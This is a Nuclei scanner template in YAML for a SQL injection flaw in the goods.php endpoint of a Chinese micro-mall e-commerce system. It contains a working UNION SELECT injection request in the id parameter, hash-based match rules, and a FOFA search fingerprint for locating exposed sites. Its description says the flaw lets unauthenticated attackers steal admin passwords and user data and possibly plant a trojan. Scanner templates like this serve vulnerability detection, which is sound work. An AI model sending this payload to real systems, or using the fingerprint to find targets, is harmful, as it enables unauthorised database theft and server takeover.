http:
    - matchers:
        - part: body
          type: word
          words:
            - e10adc3949ba59abbe56e057f20f883e
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          GET /goods.php?id='+UNION+ALL+SELECT+NULL,NULL,NULL,CONCAT(IFNULL(CAST(MD5(123456)+AS+NCHAR),0x20)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+- HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
id: weishangcheng-goods_php-sql
info:
    author: Superhero
    description: |-
        fofa: body="/Mao_Public/js/jquery-2.1.1.min.js"
        微商城系统 goods.php 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
    name: 微商城系统 goods.php SQL注入漏洞
    reference:
        - https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247486641&idx=1&sn=642495eafd7108878e12e5d9b8e242f9&chksm=c267b982f51030946dd604381cffc2dc8c44e15dbb8f302eb9521151c9891878fdc0bb3d79f7&token=522460222&lang=zh_CN#rd
    severity: high
    tags: []
